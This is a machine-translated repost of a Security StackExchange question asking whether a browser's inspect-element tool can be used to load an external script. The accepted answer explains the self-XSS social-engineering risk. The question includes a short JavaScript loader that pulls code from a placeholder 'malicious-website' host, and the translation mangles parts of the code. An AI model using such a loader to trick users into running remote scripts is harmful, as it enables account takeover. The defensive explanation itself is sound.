是否可以通过“检查元素”特性加载外部JS脚本?
是否可以通过“检查元素”特性加载外部JS脚本?
提问于 2016-10-02 11:05:59
- 开式检查元件
- 右键单击body标记或任何地方,然后编辑为HTML:;单击加载外部脚本。 >函数loadScript(){ var script = document.createElement('script');script.setAttribute('type','text/javascript');script.setAttribute('src',‘<a href="http://malicious-website/malicious-script.js'">http://malicious-website/malicious-script.js‘</a>’);document.head.appendChild(脚本);}
那么,这种攻击有可能发生吗?
回答 1
Security用户
回答已采纳
发布于 2016-10-02 13:32:16
我会把它归类为“社会工程”,有人告诉三分之一的人用他们的devtools来做。是的,这是一个可能的攻击媒介。
当你在facebook上打开F12工具时,经常会受到警告。
来自(德语) facebook。
他们叫它自XSS
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://security.stackexchange.com/questions/138512
复制相关文章
相似问题
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号